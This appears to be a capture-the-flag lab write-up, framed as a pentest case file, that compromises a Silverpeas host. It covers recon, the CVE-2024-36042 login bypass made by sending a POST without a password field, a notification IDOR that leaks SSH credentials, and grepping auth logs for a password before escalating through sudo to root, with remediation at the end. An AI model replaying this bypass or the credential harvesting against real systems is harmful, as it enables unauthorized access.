Silverpeas auth bypass to SSH and sudo via auth logs
Silverpeas on 8080 vulnerable to CVE-2024-36042 (password parameter omission). Authenticated IDOR on notifications exposed SSH credentials for tim. Auth logs leaked tyler’s password; tyler had full sudo.
- Case files
- Silverpeas auth bypass to SSH and sudo via auth logs
Public marketing site leaked a username and product name. Silverpeas auth bypass plus notification IDOR produced SSH access. Log scraping and sudoers completed root.
nmap and dirsearch located Silverpeas under :8080/silverpeas with a login JSP.
Intercepted login POST for scr1ptkiddy, removed the password parameter, followed redirects to an authenticated session.
SSH as tim. grep of /var/log/auth* recovered tyler’s password. tyler had (ALL : ALL) ALL.
Engagement summary
Public marketing site leaked a username and product name. Silverpeas auth bypass plus notification IDOR produced SSH access. Log scraping and sudoers completed root.
Host silver-platter (10.10.12.168) ran nginx on 80 and Silverpeas behind 8080. Contact content disclosed username scr1ptkiddy. CVE-2024-36042 allowed authentication by omitting the password field on the login POST. Notification IDOR at ID 6 exposed tim’s SSH password. tim was in group adm and could read auth logs containing tyler’s password; tyler held (ALL) sudo.
Business impact
A single CMS authentication flaw plus chatty notifications and readable auth logs escalated from anonymous web to root. Patch Silverpeas, fix IDOR on notifications, restrict adm log access, and eliminate password material from syslog.
Recon and Silverpeas discovery
nmap and dirsearch located Silverpeas under :8080/silverpeas with a login JSP.
OPERATOR · NMAP
savvy@lab:~$ nmap 10.10.12.168 -sV -sC
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4
80/tcp open http nginx 1.18.0 (Ubuntu)
8080/tcp open http-proxy
OPERATOR · DIRSEARCH
savvy@lab:~$ dirsearch -u http://10.10.12.168:8080/silverpeas
302 - /silverpeas/;admin/ -> .../silverpeas/defaultLogin.jsp
200 - /silverpeas/password.js
CVE-2024-36042 authentication bypass
Intercepted login POST for scr1ptkiddy, removed the password parameter, followed redirects to an authenticated session.
We authenticated as scr1ptkiddy by submitting Login without a password field. The application accepted the truncated body and issued a valid session cookie.
HTTP
AuthenticationServlet (password omitted)
POST /silverpeas/AuthenticationServlet HTTP/1.1
Host: 10.10.12.168:8080
Content-Type: application/x-www-form-urlencoded
Login=scr1ptkiddyFinding
Notification resource ID 6 disclosed SSH credentials: tim / cm0nt!md0ntf0rg3tth!spa$$w0rdagainlol
SSH foothold and sudo via auth logs
SSH as tim. grep of /var/log/auth* recovered tyler’s password. tyler had (ALL : ALL) ALL.
OPERATOR · SSH
savvy@lab:~$ ssh tim@10.10.12.168
Welcome to Ubuntu 22.04.3 LTS
savvy@lab:~$ id
uid=1001(tim) gid=1001(tim) groups=1001(tim),4(adm)
OPERATOR · LOG HARVEST
savvy@lab:~$ cat /var/log/auth* | grep -a -i pass
… tyler … _Zd_zx7N823/
savvy@lab:~$ su tyler
savvy@lab:~$ sudo -l
User tyler may run the following commands on silver-platter:
(ALL : ALL) ALL
savvy@lab:~$ sudo su
root@lab:~#
Remediation
Upgrade Silverpeas past CVE-2024-36042, authorize notification reads per user, remove passwords from auth logging, and restrict adm group membership.